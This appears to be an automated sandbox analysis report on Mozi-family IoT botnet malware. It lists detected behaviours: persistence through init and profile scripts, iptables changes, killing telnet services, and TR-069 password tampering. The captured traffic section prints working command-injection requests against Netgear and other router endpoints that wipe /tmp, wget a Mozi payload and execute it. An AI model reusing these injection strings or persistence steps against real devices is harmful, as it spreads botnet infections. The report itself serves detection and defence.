6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.113.149.148:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 122.201.116.141:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 201.49.41.72:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 216.180.103.7:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Spam, unwanted Advertisements and Ransom Demands:

barindex
Writes HTML files containing JavaScript to disk
Source: /tmp/bin.sh (PID: 6792) HTML file containing JavaScript created: /usr/networks Jump to dropped file

System Summary:

barindex
Yara signature match
Source: bin.sh, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal100.spre.troj.evad.linSH@0/221@4/0

Persistence and Installation Behavior:

barindex
Sample tries to persist itself using System V runlevels
Source: /tmp/bin.sh (PID: 6792) File: /etc/rcS.d/S95baby.sh Jump to behavior
Source: /tmp/bin.sh (PID: 6792) File: /etc/rc.local Jump to behavior
Sample tries to persist itself using /etc/profile
Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/cedilla-portuguese.sh Jump to behavior
Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/apps-bin-path.sh Jump to behavior
Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/Z97-byobu.sh Jump to behavior
Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/bash_completion.sh Jump to behavior
Source: /tmp/bin.sh (PID: 6792) File: /etc/profile.d/vte-2.91.sh Jump to behavior
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 6827) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6857) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6863) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6897) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6913) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6935) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6948) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6973) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6992) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 6995) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 6998) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7010) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7067) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7093) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7122) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7145) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7163) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7179) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7200) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7216) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7230) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7248) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7261) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7290) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7316) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7319) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7327) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7351) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7378) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7405) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7426) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7439) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT Jump to behavior
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/bin.sh (PID: 6792) File: /proc/6792/mounts Jump to behavior
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 6797) Killall command executed: killall -9 telnetd utelnetd scfgmgr Jump to behavior
Writes ELF files to disk
Source: /tmp/bin.sh (PID: 6792) File written: /usr/networks Jump to dropped file
Writes shell script files to disk
Source: /tmp/bin.sh (PID: 6792) Shell script file created: /etc/rcS.d/S95baby.sh Jump to dropped file
Source: /tmp/bin.sh (PID: 6792) Shell script file created: /etc/init.d/S95baby.sh Jump to dropped file
Reads system information from the proc file system
Source: /tmp/bin.sh (PID: 6819) Reads from proc file: /proc/stat Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/killall (PID: 6797) File opened: /proc/230/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/231/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/232/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/233/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/234/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3512/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/359/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/1452/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3632/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3518/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/10/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/1339/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/11/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/12/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/13/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/14/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/15/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/16/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/17/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/18/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/19/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/483/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3527/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3527/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/1/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/2/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3525/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/1346/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3524/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3524/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/4/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3523/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/5/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/7/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/8/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/9/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/20/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/21/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/22/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/23/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/24/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/25/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/28/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/29/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/1363/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3541/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3541/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/1362/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/496/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/496/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/30/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/31/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/31/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/1119/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3310/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3431/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3431/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/263/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/264/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/385/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/144/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/386/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/145/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/146/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3546/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3546/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/147/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3303/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3545/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/148/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/149/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3543/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/822/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/822/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3308/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3308/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3429/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3429/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/6395/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/47/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/48/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/48/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/49/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/150/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/271/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/151/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/152/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/153/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/395/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/154/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/396/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/155/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/156/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/157/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/158/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/159/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3432/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3432/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/50/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/51/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/3678/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/52/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/53/stat Jump to behavior
Source: /usr/bin/killall (PID: 6797) File opened: /proc/54/stat Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 6827) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6857) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6863) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6897) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6913) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6935) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6948) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6973) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6992) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 6995) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 6998) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7010) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7067) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7093) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7122) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7145) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7163) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7179) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7200) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7216) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7230) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 7248) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 7261) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7290) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 7316) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7319) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7327) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7351) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7378) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7405) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7426) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 7439) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT Jump to behavior
Sample tries to set the executable flag
Source: /tmp/bin.sh (PID: 6792) File: /usr/networks (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/bin.sh (PID: 6792) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/bin.sh (PID: 6792) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/bin.sh (PID: 6794) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr" Jump to behavior
Source: /tmp/bin.sh (PID: 6825) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 6855) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 6858) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 6893) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 6904) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 47453 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 6932) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 6940) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 6967) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT" Jump to behavior
Source: /tmp/bin.sh (PID: 6990) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 6993) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 6996) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7002) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7031) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"" Jump to behavior
Source: /tmp/bin.sh (PID: 7047) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\"" Jump to behavior
Source: /tmp/bin.sh (PID: 7060) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7087) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7114) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP" Jump to behavior
Source: /tmp/bin.sh (PID: 7140) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP" Jump to behavior
